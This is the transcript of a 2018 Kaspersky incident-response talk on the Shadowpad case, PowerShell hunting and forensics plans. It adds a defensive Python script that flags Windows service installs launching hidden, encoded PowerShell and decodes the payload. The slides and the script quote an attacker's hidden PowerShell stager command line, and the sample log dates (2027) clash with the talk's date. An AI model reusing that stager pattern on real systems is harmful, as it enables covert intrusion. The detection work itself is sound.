Sergey Golovanov - Indecent Response 2018
DC7499
February 10, 2018
Transcript
Indecent Response 2018. Sergey @k1k_ Golovanov, Principal Security Researcher, Kaspersky Lab
Challenge: find an SDC bus speed
Agenda
1. Shadowpad
2. 0x403AA91EE
3. Scanner2
4. Plans
1. Shadowpad
Case overview:
1. The bank's antifraud system detects a lot of elite cards being printed over the last several hours
2. The bank starts a network audit
3. The bank discovers suspicious DNS requests
4. Forensics cannot find malware on the PCs
5. The bank asks for help…
DNS requests
"Our worldwide customers range from small businesses right up to global Fortune 500 companies." NetSarang
American Express, Bank of America Corp., Bank of China, BNP Paribas, Citigroup, Deutsche Bank, Fortis, General Electric, ING Group, Merrill Lynch, Morgan Stanley, Shinhan Financial Group, Societe Generale, UBS
https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsarang.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru
https://securelist.com/shadowpad-in-corporate-networks/81432/
What was done?
AutoMA – static analysis framework
Shadowpad after autoMA
Miniduke after autoMA
2. 0x403AA91EE
Case overview:
How to find suspicious DNS requests? sort | uniq -c | sort -rn
How to find suspicious PowerShell? sort | uniq -c | sort -rn
parse_evtx.exe System.evtx | findstr /i "power" | more
Record #2396788 2027.02.22-08:03:00 'Computer':'PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':'GUID', 'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':'1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
https://github.com/KasperskyLab/ForensicsTools/
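The two hunting steps above (EventID 7045 service installs that launch PowerShell with -encodedcommand, and the sort | uniq -c | sort -rn frequency trick used for the DNS requests and later in the Scanner2 case) as a single added Python example. This is not code from the talk or from KasperskyLab/ForensicsTools: the three event records and the DNS list are constructed here, in the one-line key:value style the slide shows for parse_evtx.exe output (the real tool's format is assumed from that one line), and the base64 fragment is the one on the slide, which is UTF-16LE and decodes to the start of a typical in-memory stager, "$s=New-Object IO.MemoryStream(".

```python
# Added example, not from the talk or from KasperskyLab/ForensicsTools.
# Hunts EventID 7045 "service installed" records whose ImagePath starts
# PowerShell with -EncodedCommand, decodes the payload (base64 of UTF-16LE),
# and reproduces `sort | uniq -c | sort -rn` in Python.
import base64
import binascii
import re
from collections import Counter

# Constructed records in the one-line key:value style shown on the slide
# (assumed parse_evtx.exe format). Only the first one is an attacker install.
SAMPLE_RECORDS = [
    "Record #2396788 2027.02.22-08:03:00 'Computer':'PC1', 'Channel':'System', "
    "'EventSourceName':'Service Control Manager', 'EventID':7045 (A service was "
    "installed in the system.), 'ServiceName':'1aec4f0', 'ImagePath':'%COMSPEC% "
    "/b /c start /b /min powershell.exe -nop -w hidden -encodedcommand "
    "JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA'",
    "Record #2396790 2027.02.22-08:05:13 'Computer':'PC1', 'Channel':'System', "
    "'EventSourceName':'Service Control Manager', 'EventID':7045 (A service was "
    "installed in the system.), 'ServiceName':'Spooler', "
    "'ImagePath':'C:\\Windows\\System32\\spoolsv.exe'",
    "Record #2396791 2027.02.22-08:05:14 'Computer':'PC1', 'Channel':'System', "
    "'EventSourceName':'Service Control Manager', 'EventID':7036 (The service "
    "entered the running state.), 'ServiceName':'Spooler'",
]

# Constructed DNS query names; the one-off random-looking name is the
# kind of entry the frequency count is meant to surface.
SAMPLE_DNS = [
    "update.microsoft.com", "ocsp.digicert.com", "update.microsoft.com",
    "kq7zfd1.example", "update.microsoft.com", "ocsp.digicert.com",
]

EVENT_ID_RE = re.compile(r"'EventID':(\d+)")
SERVICE_RE = re.compile(r"'ServiceName':'([^']*)'")
IMAGE_RE = re.compile(r"'ImagePath':'([^']*)'")
# powershell.exe accepts -e, -ec, -enc and any longer prefix of -EncodedCommand;
# "-exec"/"-ep" do not match because the optional group needs "c" or "n...".
ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(blob):
    """Decode a -EncodedCommand payload: base64 wrapping UTF-16LE text.
    Returns None when the blob is not valid base64 or not UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def suspicious_service_installs(records):
    """Keep 7045 records whose ImagePath launches PowerShell, like
    `parse_evtx.exe System.evtx | findstr /i "power"` restricted to 7045,
    and attach the decoded command when one is present."""
    hits = []
    for rec in records:
        eid = EVENT_ID_RE.search(rec)
        if not eid or eid.group(1) != "7045":
            continue
        image = IMAGE_RE.search(rec)
        if not image or "powershell" not in image.group(1).lower():
            continue
        svc = SERVICE_RE.search(rec)
        enc = ENC_RE.search(image.group(1))
        hits.append({
            "service": svc.group(1) if svc else "",
            "image_path": image.group(1),
            "decoded": decode_encoded_command(enc.group(1)) if enc else None,
        })
    return hits


def frequency(values):
    """Python equivalent of `sort | uniq -c | sort -rn`: (count, value)
    pairs, most frequent first. On a fleet-wide dump of DNS names or
    service names the one-off entries at the tail are where to look."""
    return sorted(((n, v) for v, n in Counter(values).items()),
                  key=lambda cv: (-cv[0], cv[1]))


if __name__ == "__main__":
    for hit in suspicious_service_installs(SAMPLE_RECORDS):
        print(hit["service"], "->", hit["decoded"])
    for count, name in frequency(SAMPLE_DNS):
        print(count, name)
```

The regexes are written against the single record shown on the slide; against real parse_evtx.exe output (or any other EVTX dumper) check the field names and quoting first. A seven-character service name like 1aec4f0 combined with %COMSPEC% starting a hidden PowerShell is worth flagging even before the payload is decoded.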
3. Scanner2
Case overview:
1. No money
2. No logs
3. No team
4. No idea about the network
5. CISO!
What to do? We need logs, we need MFTs, we need registry hives
WE NEED TO RECOMPILE EVERYTHING!
Awesome batch file
How to find something suspicious? sort | uniq -c | sort -rn
https://cdn.securelist.com/files/2017/12/HappyNewYear.zip
4. Plans
1. MFT is hell. Sleuthkit is not enough; we need more data about deleted files.
2. The USN journal is required, without touching the HDD.
3. Registry analysis is needed, including the unallocated part.
Why?
Thank you! Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky Lab